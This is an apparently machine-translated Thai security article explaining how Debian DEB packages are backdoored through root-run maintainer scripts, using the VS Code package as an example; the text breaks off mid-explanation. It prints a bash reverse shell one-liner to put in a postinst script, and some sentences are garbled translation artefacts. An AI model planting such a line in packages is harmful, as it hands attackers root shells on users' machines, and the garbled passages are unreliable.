แพ็คเกจ DEB ถูกแบ็คดอร์อย่างไร และจะตรวจจับได้อย่างไร

ประเด็นที่สำคัญ

ผู้ที่อาจเป็นอันตรายอาจใช้ประโยชน์จากที่เก็บแพ็คเกจ Debian โดยการแอบแนะนำซอฟต์แวร์ที่เป็นอันตรายเข้าสู่ระบบของผู้ใช้ผ่านกระบวนการติดตั้งในขณะที่ใช้สิทธิ์ระดับสูง

การตรวจจับไฟล์แพ็คเกจ Debian ที่ติดไวรัสอาจเป็นเรื่องท้าทาย เนื่องจากอาจหลบเลี่ยงการตรวจจับโดยโปรแกรมป้องกันไวรัสและแพลตฟอร์มบนคลาวด์ เช่น VirusTotal

เพื่อปกป้องตนเอง ขอแนะนำให้หลีกเลี่ยงการรับแพ็คเกจ DEB จากแหล่งที่ไม่คุ้นเคย แทนที่จะเลือกใช้แพลตฟอร์มการจัดจำหน่ายที่ได้รับอนุญาตหรือเว็บไซต์ที่ได้รับการรับรองโดยชุมชนที่น่าเชื่อถือ นอกจากนี้ การใช้มาตรการรักษาความปลอดภัยบนระบบปฏิบัติการ Linux สามารถช่วยบรรเทาภัยคุกคามที่อาจเกิดขึ้นจากการโจมตีทางไซเบอร์ได้

ไฟล์ DEB แสดงถึงรูปแบบการส่งมอบซอฟต์แวร์ที่แพร่หลายสำหรับระบบปฏิบัติการ Linux ที่ใช้ Debian ซึ่งทำหน้าที่เป็นรูปแบบบรรจุภัณฑ์มาตรฐานสำหรับการกระจายแอปพลิเคชันภายในแพลตฟอร์มเหล่านี้

ในการปรับใช้ไฟล์ Debian Package (DEB) จำเป็นต้องใช้ประโยชน์จากเครื่องมือการจัดการแพ็คเกจ เช่น dpkg ในขณะที่มีสิทธิ์ระดับผู้ดูแลระบบ อย่างไรก็ตาม อาชญากรไซเบอร์ใช้ประโยชน์จากช่องโหว่นี้โดยการฝังจุดเข้าใช้งานที่ไม่ได้รับอนุญาตภายในแพ็คเกจเหล่านี้ ซึ่งส่งผลให้มีการติดตั้งผ่าน dpkg หรือโปรแกรมติดตั้งซอฟต์แวร์อื่นที่เทียบเคียงได้ กลยุทธ์นี้นำไปสู่การละเมิดที่อาจเกิดขึ้นในกรอบความปลอดภัยของระบบคอมพิวเตอร์

ให้เราเจาะลึกความซับซ้อนของช่องโหว่แบ็คดอร์ที่มีอยู่ในแพ็คเกจ DEB และตรวจสอบมาตรการที่สามารถนำมาใช้เพื่อป้องกันตนเองจากภัยคุกคามที่อาจเกิดขึ้น

แพ็คเกจ DEB ถูกแบ็คดอร์อย่างไร?

ก่อนอื่นให้เราเจาะลึกความซับซ้อนของ Debian Package Archives (DEB) ก่อนที่จะอธิบายความอ่อนไหวต่อช่องโหว่ของแบ็คดอร์ เพื่ออธิบายแนวคิดนี้ เราจะใช้แพ็คเกจ Microsoft Visual Studio Code DEB ที่แพร่หลายซึ่งได้รับโดยตรงจากเว็บไซต์ Microsoft ที่นับถือเป็นจุดอ้างอิงของเรา แพ็คเกจเดียวกับที่ผู้ที่ชื่นชอบ Linux ทั่วโลกใช้เมื่อติดตั้ง Visual Studio Code บนระบบของตน

ดาวน์โหลด: รหัส Visual Studio

หากต้องการแยกเนื้อหาของแพ็คเกจ DEB โดยใช้ยูทิลิตี้ dpkg-deb อาจใช้แฟล็ก"-R"ร่วมกับเส้นทางไดเร็กทอรีที่ควรจัดเก็บไฟล์ที่แยกออกมา ไวยากรณ์สำหรับการดำเนินการนี้จะมีลักษณะดังนี้:cssdpkg-deb-R [DEPENDENCY_PATH] [TARGET_FILENAME]

 dpkg-deb -R <package_name> <path> 

วิธีหนึ่งที่เป็นไปได้ในการอธิบายข้อความนี้ในลักษณะที่ละเอียดยิ่งขึ้นจะเป็นดังนี้:“การดำเนินการนี้มีวัตถุประสงค์เพื่อดึงเนื้อหาที่มีอยู่ในชุดซอฟต์แวร์ VS Code

เมื่อเข้าถึงโฟลเดอร์ที่กำหนด จะพบไดเร็กทอรีย่อยมากมาย อย่างไรก็ตาม โปรดทราบว่าเราเกี่ยวข้องกับไดเร็กทอรี"DEBIAN"ภายในโฟลเดอร์ดังกล่าวเท่านั้น ไดเร็กทอรีดังกล่าวมีชุดสคริปต์การบำรุงรักษาซึ่งจะดำเนินการระหว่างการติดตั้งและมีสิทธิ์การยกระดับ โดยเฉพาะสิทธิ์ของผู้ใช้รูท ไม่น่าแปลกใจเลยที่ผู้ประสงค์ร้ายจะจัดการสคริปต์เหล่านี้เพื่อจุดประสงค์ที่ชั่วร้าย

อนุญาตให้ฉันปรับแต่งภาษาสำหรับคุณ อินสแตนซ์ที่เกี่ยวข้องเกี่ยวข้องกับการแก้ไขสคริปต์หลังการติดตั้งและรวมเชลล์ TCP แบบย้อนกลับที่สะดวกเป็นคำสั่ง Bash บรรทัดเดียว เพื่อให้สอดคล้องกับระบบการตั้งชื่อ สคริปต์นี้จะถูกทริกเกอร์หลังจากการติดตั้งแพ็คเกจซอฟต์แวร์บนระบบ

สคริปต์ดังกล่าวครอบคลุมคำสั่งสำหรับการสร้างแง่มุมต่าง ๆ ของการกำหนดค่า รวมถึงการสร้างลิงก์สัญลักษณ์และการจัดการการขึ้นต่อกัน โซลูชัน Reverse Shell ทางเลือกมากมายมีวางจำหน่ายทางออนไลน์ โดยหลายรายการมีฟังก์ชันการทำงานที่คล้ายคลึงกัน ตัวอย่างเช่น ตัวอย่างที่ชัดเจนของการใช้ประโยชน์จาก Reverse Shell อาจถูกดำเนินการโดยใช้คำสั่งต่อไปนี้:

 bash -i >& /dev/tcp/127.0.0.1/42069 0>&1 

คำอธิบายของคำสั่ง:

การดำเนินการของ Bash เชลล์เริ่มต้นโดยใช้คำสั่งนี้

การปรากฏของธงทำให้ Bash ทำงานในรูปแบบอินเทอร์แอคทีฟ ทำให้สามารถป้อนข้อมูลและเอาต์พุตสำหรับคำสั่งได้ทันที

คำสั่ง “